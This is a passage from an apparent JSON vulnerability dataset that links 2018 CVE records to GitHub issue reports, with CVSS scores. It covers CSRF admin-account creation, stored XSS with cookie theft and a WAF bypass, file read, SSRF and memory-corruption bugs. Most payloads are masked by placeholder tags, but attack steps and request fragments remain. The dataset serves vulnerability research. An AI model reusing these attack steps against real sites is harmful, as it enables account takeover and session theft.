  18052. "description": "CSRF issue that allows attacker to create an account. Hello. I want to report it has CSRF issue in admin pages. When attacker induce authenticated admin user to a malicious web page, the account will be created without admin user's intention. Here is how to reproduce the issue NUMBERTAG Login to admin APITAG NUMBERTAG Keep login and access the html it has following content APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG And account username = hacker is created without admin user's intention.",
  18053. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18054. "severity": "HIGH",
  18055. "baseScore": 8.8,
  18056. "impactScore": 5.9,
  18057. "exploitabilityScore": 2.8
  18058. },
  18059. {
  18060. "CVE_ID": "CVE-2018-10118",
  18061. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/436",
  18062. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/436",
  18063. "Repo_new": "monstra-cms/monstra",
  18064. "Issue_Created_At": "2018-04-15T04:30:21Z",
  18065. "description": "Stored XSS APITAG Authentication). Two Stored XSS reported NUMBERTAG title section) and NUMBERTAG content section) I found another Stored XSS lie in Name filed in the same page ( PATHTAG ) Steps to reproduce: APITAG monstra FILETAG APITAG visit URLTAG APITAG Create New Page button to create a new page APITAG in Name field with payload APITAG APITAG and Exit NUMBERTAG isit the page you just created, then Stored XSS will be triggered Impacts: Anyone who visit the target page will trigger APITAG code execution, including administrator, editor, and guest. Affected Version NUMBERTAG or before Affected URL: FILETAG Testing Environment: Win7 with XAMPP: APITAG \u3001 PHP Version NUMBERTAG Analysis vulnerable page : FILETAG line NUMBERTAG all post data without any sanitization, just add and display Add page and edit page are vulnerable. Mitigation: Filter user input ,please refer NUMBERTAG",
  18066. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18067. "severity": "MEDIUM",
  18068. "baseScore": 4.8,
  18069. "impactScore": 2.7,
  18070. "exploitabilityScore": 1.7
  18071. },
  18072. {
  18073. "CVE_ID": "CVE-2018-10121",
  18074. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/437",
  18075. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/437",
  18076. "Repo_new": "monstra-cms/monstra",
  18077. "Issue_Created_At": "2018-04-15T14:03:50Z",
  18078. "description": "ERRORTAG page have Stored XSS Vulnerability. Stored XSS reported NUMBERTAG title section NUMBERTAG content section NUMBERTAG title section) I found another stored XSS in ERRORTAG page(name field),the Vulnerability source in PATHTAG Affected Version NUMBERTAG or before Payload: APITAG Steps to replicate NUMBERTAG Goto URLTAG NUMBERTAG Click Edit ERRORTAG page ( URLTAG NUMBERTAG Enter payload in title section and save NUMBERTAG isit FILETAG NUMBERTAG You will triage Javascript execution Impacts: A user with editor level privileges can make APITAG code execution in admin's session. Testing Environment: APITAG + APITAG",
  18079. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  18080. "severity": "MEDIUM",
  18081. "baseScore": 4.8,
  18082. "impactScore": 2.7,
  18083. "exploitabilityScore": 1.7
  18084. },
  18085. {
  18086. "CVE_ID": "CVE-2018-10122",
  18087. "Issue_Url_old": "https://github.com/goodrain-apps/chanzhieps/issues/1",
  18088. "Issue_Url_new": "https://github.com/goodrain-apps/chanzhieps/issues/1",
  18089. "Repo_new": "goodrain-apps/chanzhieps",
  18090. "Issue_Created_At": "2018-04-16T01:28:38Z",
  18091. "description": "Front desk arbitrary file reading NUMBERTAG download url FILETAG poc APITAG vul file in APITAG Controllable parameters APITAG ,$pathname ,$extension, Final execution is APITAG while APITAG = APITAG APITAG = APITAG . $pathname; APITAG = APITAG APITAG = APITAG '/') . PATHTAG result APITAG \"r\");",
  18092. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  18093. "severity": "HIGH",
  18094. "baseScore": 7.5,
  18095. "impactScore": 3.6,
  18096. "exploitabilityScore": 3.9
  18097. },
  18098. {
  18099. "CVE_ID": "CVE-2018-10127",
  18100. "Issue_Url_old": "https://github.com/gosea/xyhcms/issues/1",
  18101. "Issue_Url_new": "https://github.com/gosea/xyhcms/issues/1",
  18102. "Repo_new": "gosea/xyhcms",
  18103. "Issue_Created_At": "2018-04-16T07:51:13Z",
  18104. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page will add an administrator role ERRORTAG",
  18105. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18106. "severity": "HIGH",
  18107. "baseScore": 8.8,
  18108. "impactScore": 5.9,
  18109. "exploitabilityScore": 2.8
  18110. },
  18111. {
  18112. "CVE_ID": "CVE-2018-10128",
  18113. "Issue_Url_old": "https://github.com/gosea/xyhcms/issues/2",
  18114. "Issue_Url_new": "https://github.com/gosea/xyhcms/issues/2",
  18115. "Repo_new": "gosea/xyhcms",
  18116. "Issue_Created_At": "2018-04-16T08:31:55Z",
  18117. "description": "There is a XSS vulnerability that can execute the APITAG code. url: URLTAG URL is written to the HTML page and closed by using \u2018>. FILETAG",
  18118. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18119. "severity": "MEDIUM",
  18120. "baseScore": 6.1,
  18121. "impactScore": 2.7,
  18122. "exploitabilityScore": 2.8
  18123. },
  18124. {
  18125. "CVE_ID": "CVE-2018-10177",
  18126. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1095",
  18127. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1095",
  18128. "Repo_new": "imagemagick/imagemagick",
  18129. "Issue_Created_At": "2018-04-16T22:11:54Z",
  18130. "description": "Infinite loop in APITAG ( PATHTAG ). Commit: APITAG Description In latest commit of APITAG there is an infinite loop in APITAG function of PATHTAG file, which could be triggered by the attached POC. The issue is in the following loop, and seems that image_info is never updated inside the loop (line NUMBERTAG static Image APITAG mng_info, const APITAG image_info NUMBERTAG APITAG exception NUMBERTAG do NUMBERTAG while APITAG >magick,\"MNG NUMBERTAG Steps to Reproduce NUMBERTAG install libpng NUMBERTAG checkout commit APITAG of APITAG NUMBERTAG compile APITAG and run: PATHTAG $POC FILETAG . System Configuration APITAG version: APITAG Environment APITAG system, version and so on): Linux test NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Oct NUMBERTAG UTC NUMBERTAG APITAG Stack Trace NUMBERTAG ffff6cafc NUMBERTAG in __GI___fxstat (vers=<optimized out>, fd NUMBERTAG buf NUMBERTAG ac8) at PATHTAG NUMBERTAG ffff NUMBERTAG af9d in APITAG (image NUMBERTAG ca NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG d8a NUMBERTAG in APITAG (mng_info NUMBERTAG image_info NUMBERTAG b NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG e NUMBERTAG in APITAG (image_info NUMBERTAG b NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG a1d0c in APITAG (image_info NUMBERTAG d NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG b in APITAG (image_info NUMBERTAG a NUMBERTAG filename NUMBERTAG c NUMBERTAG APITAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG e in APITAG (image_info NUMBERTAG a NUMBERTAG argc NUMBERTAG arg NUMBERTAG b NUMBERTAG metadata NUMBERTAG fffffffbcc0, exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG eb NUMBERTAG in APITAG (image_info NUMBERTAG command NUMBERTAG fb0 APITAG argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG metadata NUMBERTAG exception NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at PATHTAG FILETAG",
  18131. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  18132. "severity": "MEDIUM",
  18133. "baseScore": 6.5,
  18134. "impactScore": 3.6,
  18135. "exploitabilityScore": 2.8
  18136. },
  18137. {
  18138. "CVE_ID": "CVE-2018-10183",
  18139. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/333",
  18140. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/333",
  18141. "Repo_new": "bigtreecms/bigtree-cms",
  18142. "Issue_Created_At": "2018-04-17T12:41:08Z",
  18143. "description": "Cross site Scripting (XSS) in bigtreecms NUMBERTAG Cross site Scripting (XSS) in bigtreecms NUMBERTAG The vulnerability is in PATHTAG FILETAG POC\uff1a PATHTAG APITAG APITAG alert NUMBERTAG APITAG &file=charsets FILETAG thank you~",
  18144. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18145. "severity": "MEDIUM",
  18146. "baseScore": 6.1,
  18147. "impactScore": 2.7,
  18148. "exploitabilityScore": 2.8
  18149. },
  18150. {
  18151. "CVE_ID": "CVE-2018-10185",
  18152. "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/1",
  18153. "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/1",
  18154. "Repo_new": "yeyinshi/tuzicms",
  18155. "Issue_Created_At": "2018-04-17T13:39:09Z",
  18156. "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in\uff0cwe can use the poc to add a admin\uff1a APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  18157. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18158. "severity": "HIGH",
  18159. "baseScore": 8.8,
  18160. "impactScore": 5.9,
  18161. "exploitabilityScore": 2.8
  18162. },
  18163. {
  18164. "CVE_ID": "CVE-2018-10187",
  18165. "Issue_Url_old": "https://github.com/radare/radare2/issues/9913",
  18166. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9913",
  18167. "Repo_new": "radareorg/radare2",
  18168. "Issue_Created_At": "2018-04-17T14:40:15Z",
  18169. "description": "heap buffer overflow in dalvik_op ( PATHTAG ). Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | dex | Architecture/bits of the file (mandatory) | Dalvik dex file version NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Success processing of dex file Actual behavior heap buffer overflow Steps to reproduce the behavior NUMBERTAG checkout commit APITAG NUMBERTAG compile with ASAN enabled NUMBERTAG download the attached POC NUMBERTAG run: bin/radare2 A $POC Vulnerable code PATHTAG NUMBERTAG static int APITAG anal, APITAG op, ut NUMBERTAG addr, const ut8 data, int len NUMBERTAG case NUMBERTAG a: // goto NUMBERTAG if (len NUMBERTAG op >jump = addr + (int)(data FILETAG",
  18170. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  18171. "severity": "MEDIUM",
  18172. "baseScore": 5.5,
  18173. "impactScore": 3.6,
  18174. "exploitabilityScore": 1.8
  18175. },
  18176. {
  18177. "CVE_ID": "CVE-2018-10191",
  18178. "Issue_Url_old": "https://github.com/mruby/mruby/issues/3995",
  18179. "Issue_Url_new": "https://github.com/mruby/mruby/issues/3995",
  18180. "Repo_new": "mruby/mruby",
  18181. "Issue_Created_At": "2018-04-10T18:31:36Z",
  18182. "description": "Use after free caused by integer overflow in environment stack. URLTAG reported the following: Root Cause: =========== Nesting many scopes as seen in the input leads to an integer overflow in OP_GET_UPVAR: CODETAG Details: ======== If NUMBERTAG scopes are nested and we access a variable from the outermost scope from the innermost scope, c overflows to NUMBERTAG b contains the index of of the variable in the outer scope, but is used to offset into the inner scopes stackframe. If the outermost scope contains many variables, b can become large. If b is large, and the innermost stackframe is small, we can use memory from outside the stackframe as mrb_value. In some cases, a mrb_value can contains a pointer (objects, strings etc). In these cases, the pointer can be corrupted by controlling the memory outside the stack frame. Our POC triggers a use after free access (see APITAG In other cases, we can simply change variables from other stackframes, we observed some type confusions in various C functions that seem to dislike values changing magically (see the attached input nullptr_deref.rb, where a corrupted proc object is used in places where an object is expected). Bugfix: ======= Ensure that deep nesting is an error condition (As this will cause bugs in ruby programs, even if the underlaying C code is fixed). Additionally add the following check (taken from SET_UPVAR, where the size is checked correctly) APITAG Steps to Reproduce: ================== setup latest mruby CODETAG run inputs: ERRORTAG and also: ERRORTAG Authors: ======== Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto, Tigist Abera Impact By leveraging the use after free, an attacker is most likely able to obtain arbitrary code execution. APITAG : CODETAG APITAG : CODETAG",
  18183. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18184. "severity": "CRITICAL",
  18185. "baseScore": 9.8,
  18186. "impactScore": 5.9,
  18187. "exploitabilityScore": 3.9
  18188. },
  18189. {
  18190. "CVE_ID": "CVE-2018-10199",
  18191. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4001",
  18192. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4001",
  18193. "Repo_new": "mruby/mruby",
  18194. "Issue_Created_At": "2018-04-16T15:50:03Z",
  18195. "description": "Use after free in File initilialize_copy. The following was reported by URLTAG Root Cause: ========== calling APITAG with an invalid argument, causes the function to terminate early, leaving a dangling pointer in the recievers APITAG . ERRORTAG Details & Impact ======= initialize_copy first frees the APITAG , then it gets the data pointer for the first argument. This operation can raise an exception, in which case APITAG remains dangeling. By proper heap feng shui, one can allocate another value (such as string) in the same spot. Calling APITAG will set APITAG , effectively setting some memory to APITAG . This can be used to change the size of a string object. The corrupted string can then be used to read/write memory. This can be used to obtain arbitrary code execution. CODETAG Bugfix ====== Move APITAG to the top of the function (next to APITAG ). Steps to Reproduce ================== obtain current mruby version CODETAG run testcase ERRORTAG Authors: Daniel Teuchert, Cornelius Aschermann, Tommaso Frassetto, Tigist Abera",
  18196. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  18197. "severity": "CRITICAL",
  18198. "baseScore": 9.8,
  18199. "impactScore": 5.9,
  18200. "exploitabilityScore": 3.9
  18201. },
  18202. {
  18203. "CVE_ID": "CVE-2018-10220",
  18204. "Issue_Url_old": "https://github.com/mushorg/glastopf/issues/286",
  18205. "Issue_Url_new": "https://github.com/mushorg/glastopf/issues/286",
  18206. "Repo_new": "mushorg/glastopf",
  18207. "Issue_Created_At": "2018-04-16T07:28:39Z",
  18208. "description": "there is a vulnerability of Server Side Request Forgery. My English isn't fluent when I let this program run in my nginx web site, I find it has Server Side Request Forgery vulnerability for example , the url is APITAG and I can get the log from the other web server which this APITAG it. I know you have do something that prevent it, though I can see ERRORTAG from this request APITAG Maybe the other hackers could use it to attack the other website as a proxy My English really is not fluent I hope you can understand my means, thanks, bro.",
  18209. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18210. "severity": "HIGH",
  18211. "baseScore": 8.8,
  18212. "impactScore": 5.9,
  18213. "exploitabilityScore": 2.8
  18214. },
  18215. {
  18216. "CVE_ID": "CVE-2018-10221",
  18217. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/129",
  18218. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/129",
  18219. "Repo_new": "wuzhicms/wuzhicms",
  18220. "Issue_Created_At": "2018-04-18T08:50:37Z",
  18221. "description": "There is a persistent XSS vulnerability that can steal the cookies of the administrator . After the website editor(whose privilege is lower than the administrator) logged in,he can add a new TAGS with the XSS payload. exploit the vulnerability\uff0ca website editor can steal the cookies when the administrator browse the TAGS Management and activate the XSS code . The vulnerability APITAG distribution >TAGS management >ADD TAGS FILETAG Inject the XSS payload: APITAG alert(/xss/) APITAG FILETAG",
  18222. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18223. "severity": "MEDIUM",
  18224. "baseScore": 5.4,
  18225. "impactScore": 2.7,
  18226. "exploitabilityScore": 2.3
  18227. },
  18228. {
  18229. "CVE_ID": "CVE-2018-10222",
  18230. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/21",
  18231. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/21",
  18232. "Repo_new": "idreamsoft/iCMS",
  18233. "Issue_Created_At": "2018-04-18T04:39:00Z",
  18234. "description": "CSRF exists in the idreamsoft iCMS NUMBERTAG Column Management add. CSRF exists in the idreamsoft iCMS NUMBERTAG Column Management add and can be add Column Management by constructing paylod\u3002 Paylod: APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
  18235. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18236. "severity": "HIGH",
  18237. "baseScore": 8.8,
  18238. "impactScore": 5.9,
  18239. "exploitabilityScore": 2.8
  18240. },
  18241. {
  18242. "CVE_ID": "CVE-2018-10223",
  18243. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/1",
  18244. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/1",
  18245. "Repo_new": "yzmcms/yzmcms",
  18246. "Issue_Created_At": "2018-04-19T02:40:25Z",
  18247. "description": "There is two CSRF vulnerability that can add the administrator account. There is two CSRF vulnerability that can add the administrator account After the administrator logged in,open the following one page. POC: URLTAG FILETAG For example: FILETAG",
  18248. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  18249. "severity": "MEDIUM",
  18250. "baseScore": 6.8,
  18251. "impactScore": 5.9,
  18252. "exploitabilityScore": 0.9
  18253. },
  18254. {
  18255. "CVE_ID": "CVE-2018-10224",
  18256. "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/2",
  18257. "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/2",
  18258. "Repo_new": "yzmcms/yzmcms",
  18259. "Issue_Created_At": "2018-04-19T02:41:09Z",
  18260. "description": "There is two CSRF vulnerability that can add the Tag. There is two CSRF vulnerability that can add the Tag account After the administrator logged in,open the following one page. POC: URLTAG FILETAG For example: FILETAG",
  18261. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
  18262. "severity": "MEDIUM",
  18263. "baseScore": 6.8,
  18264. "impactScore": 5.9,
  18265. "exploitabilityScore": 0.9
  18266. },
  18267. {
  18268. "CVE_ID": "CVE-2018-10227",
  18269. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/15",
  18270. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/15",
  18271. "Repo_new": "bg5sbk/minicms",
  18272. "Issue_Created_At": "2018-04-18T03:28:13Z",
  18273. "description": "There is a xss vulnerability XSS vulnerability can attack users to execute commands. There is a storage XSS vulnerability at the location of the web site at the page setup site, which can be executed by constructing POC. poc: POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG APITAG FILETAG APITAG exp at the site_link parameter FILETAG APITAG through IE, run active FILETAG APITAG up the CMD command FILETAG",
  18274. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18275. "severity": "MEDIUM",
  18276. "baseScore": 5.4,
  18277. "impactScore": 2.7,
  18278. "exploitabilityScore": 2.3
  18279. },
  18280. {
  18281. "CVE_ID": "CVE-2018-10248",
  18282. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/130",
  18283. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/130",
  18284. "Repo_new": "wuzhicms/wuzhicms",
  18285. "Issue_Created_At": "2018-04-20T13:57:13Z",
  18286. "description": "There is one CSRF vulnerability that can Delete any article. After the administrator logged in, open the following page poc\uff1a APITAG Delete any article APITAG APITAG APITAG APITAG APITAG APITAG Id and cid parameters can be seen in the foreground like this URLTAG",
  18287. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  18288. "severity": "MEDIUM",
  18289. "baseScore": 6.5,
  18290. "impactScore": 3.6,
  18291. "exploitabilityScore": 2.8
  18292. },
  18293. {
  18294. "CVE_ID": "CVE-2018-10250",
  18295. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/22",
  18296. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/22",
  18297. "Repo_new": "idreamsoft/iCMS",
  18298. "Issue_Created_At": "2018-04-20T08:52:50Z",
  18299. "description": "iCMS NUMBERTAG SS. Log in first \uff08 FILETAG \uff09 All search boxes exist in XSS, payload \uff1a \"/> APITAG confirm NUMBERTAG APITAG APITAG > classified management > keyword search WAF detects alert, confirm bypasses the waf payload: APITAG APITAG GET PATHTAG NUMBERTAG APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG iCMS_tag_category_tabs=tree; APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6; APITAG APITAG APITAG APITAG Connection: keep alive Upgrade Insecure Requests NUMBERTAG FILETAG FILETAG",
  18300. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18301. "severity": "MEDIUM",
  18302. "baseScore": 5.4,
  18303. "impactScore": 2.7,
  18304. "exploitabilityScore": 2.3
  18305. },
  18306. {
  18307. "CVE_ID": "CVE-2018-10266",
  18308. "Issue_Url_old": "https://github.com/source-trace/beescms/issues/1",
  18309. "Issue_Url_new": "https://github.com/source-trace/beescms/issues/1",
  18310. "Repo_new": "source-trace/beescms",
  18311. "Issue_Created_At": "2018-04-19T12:14:03Z",
  18312. "description": "There is two CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following one page poc\uff1a CODETAG FILETAG FILETAG URLTAG FILETAG",
  18313. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18314. "severity": "HIGH",
  18315. "baseScore": 8.8,
  18316. "impactScore": 5.9,
  18317. "exploitabilityScore": 2.8
  18318. },
  18319. {
  18320. "CVE_ID": "CVE-2018-10267",
  18321. "Issue_Url_old": "https://github.com/taosir/wtcms/issues/1",
  18322. "Issue_Url_new": "https://github.com/taosir/wtcms/issues/1",
  18323. "Repo_new": "taosir/wtcms",
  18324. "Issue_Created_At": "2018-04-21T07:29:01Z",
  18325. "description": "Has a CSRF vulnerability and can add an administrator account. After the administrator logs in, open the CSRF exp page. CODETAG",
  18326. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18327. "severity": "HIGH",
  18328. "baseScore": 8.8,
  18329. "impactScore": 5.9,
  18330. "exploitabilityScore": 2.8
  18331. },
  18332. {
  18333. "CVE_ID": "CVE-2018-10295",
  18334. "Issue_Url_old": "https://github.com/chemcms/ChemCMS/issues/1",
  18335. "Issue_Url_new": "https://github.com/chemcms/chemcms/issues/1",
  18336. "Repo_new": "chemcms/chemcms",
  18337. "Issue_Created_At": "2018-04-22T09:40:24Z",
  18338. "description": "CSRF vulnerability can add the administrator account. The administrator needs to login to the background and open the following page. poc: ERRORTAG",
  18339. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18340. "severity": "HIGH",
  18341. "baseScore": 8.8,
  18342. "impactScore": 5.9,
  18343. "exploitabilityScore": 2.8
  18344. },
  18345. {
  18346. "CVE_ID": "CVE-2018-10296",
  18347. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/17",
  18348. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/17",
  18349. "Repo_new": "bg5sbk/minicms",
  18350. "Issue_Created_At": "2018-04-22T04:14:14Z",
  18351. "description": "This is a stored XSS vulnerability that we can easily get their cookie. This is a stored XSS vulnerability first\uff0cwe shoud land \uff08 URLTAG \uff09 writing articles and published an article payload APITAG APITAG i think you can see the following picture to konw more. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG UM_distinctid NUMBERTAG db NUMBERTAG f8a NUMBERTAG c NUMBERTAG a NUMBERTAG db NUMBERTAG f8c3bc; APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG csrf_token NUMBERTAG ac0a NUMBERTAG ca5abfea6 Connection: keep alive Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG when we published the article and we can see it from homepage. FILETAG If people read our articles, we can easily get their cookie. src= FILETAG FILETAG",
  18352. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18353. "severity": "MEDIUM",
  18354. "baseScore": 6.1,
  18355. "impactScore": 2.7,
  18356. "exploitabilityScore": 2.8
  18357. },
  18358. {
  18359. "CVE_ID": "CVE-2018-10311",
  18360. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/131",
  18361. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/131",
  18362. "Repo_new": "wuzhicms/wuzhicms",
  18363. "Issue_Created_At": "2018-04-23T07:59:48Z",
  18364. "description": "There is a cross site scripting vulnerability. A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter post to the APITAG When visiting again APITAG xss code execution poc: FILETAG CODETAG APITAG ERRORTAG FILETAG",
  18365. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  18366. "severity": "MEDIUM",
  18367. "baseScore": 6.1,
  18368. "impactScore": 2.7,
  18369. "exploitabilityScore": 2.8
  18370. },
  18371. {
  18372. "CVE_ID": "CVE-2018-10312",
  18373. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/132",
  18374. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/132",
  18375. "Repo_new": "wuzhicms/wuzhicms",
  18376. "Issue_Created_At": "2018-04-23T10:42:36Z",
  18377. "description": "There is one CSRF vulnerability that can Change the common member's password. The vulnerability occurs in APITAG This is the interface of a common member to reset the password FILETAG The interface does not have CSRF protection, which causes ordinary members to change the login password without knowing their members when they open the Poc page. poc: APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  18378. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  18379. "severity": "HIGH",
  18380. "baseScore": 8.8,
  18381. "impactScore": 5.9,
  18382. "exploitabilityScore": 2.8
  18383. },
  18384. {
  18385. "CVE_ID": "CVE-2018-10313",
  18386. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/133",
  18387. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/133",
  18388. "Repo_new": "wuzhicms/wuzhicms",
  18389. "Issue_Created_At": "2018-04-23T14:32:02Z",
  18390. "description": "There is a cross site scripting vulnerability . A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter post to the APITAG When the background administrator inquires about the personal information of this ordinary member, XSS triggers successfully. poc: vulnerability trigger point FILETAG CODETAG APITAG FILETAG",
  18391. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  18392. "severity": "MEDIUM",
  18393. "baseScore": 5.4,
  18394. "impactScore": 2.7,
  18395. "exploitabilityScore": 2.3
  18396. },
  18397. {
  18398. "CVE_ID": "CVE-2018-10318",
